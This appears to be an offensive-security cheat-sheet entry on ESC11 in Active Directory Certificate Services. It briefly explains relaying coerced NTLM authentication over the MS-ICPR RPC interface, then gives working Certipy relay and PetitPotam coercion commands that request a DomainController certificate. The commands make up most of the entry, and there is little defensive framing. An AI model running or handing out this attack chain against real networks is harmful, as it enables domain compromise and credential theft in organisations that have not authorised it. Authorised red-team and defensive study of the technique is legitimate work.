ESC11
The vulnerability identified as ESC11 involves exploiting the modification of the IF_ENFORCEENCRYPTICERTREQUEST
flag in the MS-ICPR
RPC interface of ADCS, potentially allowing an NTLM relay attack to request certificates from authorized certificate templates via AD CS ICPR endpoints, utilizing tools like ntlmrelayx.py
or Certipy
to relay coerced SMB NTLM authentication over RPC/ICRP, which, if successful, enables certificate enrollment over unencrypted sessions.
Linux
Abusing ESC11 with Certipy
bob$ certipy relay -target 'rpc://<adcs_address>' -ca <ca_name> -template DomainController
Coerce authentication with PetitPotam
bob$ python3 PetitPotam.py -u <user> -p <pass> -d <domain> <target_ip_address> <listener_address>
Certipy receiving Authentication from LAB-DC$
bob$ certipy relay -target 'rpc://<adcs_address>' -ca <ca_name> -template DomainController